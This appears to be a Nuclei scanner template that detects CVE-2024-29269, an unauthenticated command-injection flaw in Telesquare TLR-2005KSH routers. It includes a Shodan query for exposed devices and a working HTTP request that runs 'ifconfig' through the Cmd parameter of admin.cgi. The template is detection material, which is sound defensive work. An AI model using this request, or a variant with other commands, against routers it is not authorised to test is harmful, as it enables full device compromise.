id: CVE-2024-29269 info: name: Telesquare TLR-2005KSH - Remote Command Execution author: ritikchaddha severity: critical description: | Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions. impact: | Attackers can execute arbitrary commands on the router, leading to complete device compromise. remediation: | Update Telesquare TLR-2005KSH firmware to a version that patches the RCE vulnerability. reference: - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b - https://github.com/Ostorlab/KEV - https://github.com/YongYe-Security/CVE-2024-29269 - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-29269 epss-score: 0.93485 epss-percentile: 0.99831 cpe: cpe:2.3:h:telesquare:tlr-2005ksh:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Login to TLR-2005KSH" product: tlr-2005ksh vendor: telesquare tags: cve,cve2024,telesquare,tlr,rce,vkev,vuln http: - raw: - | GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '' - '' - 'Ethernet' - 'inet' condition: and - type: word part: header words: - 'text/xml' - type: status status: - 200 # digest: 490a0046304402201f75663a41e110f338252037a73a82d4b6c20fc4b1ed9d8921711c8e2b80dc1802200ba59f5e69c92bcdec4343ad6ca62af436e723e4c98aea6e5b512705aeb6055d:922c64590222798bb761d5b6d8e72950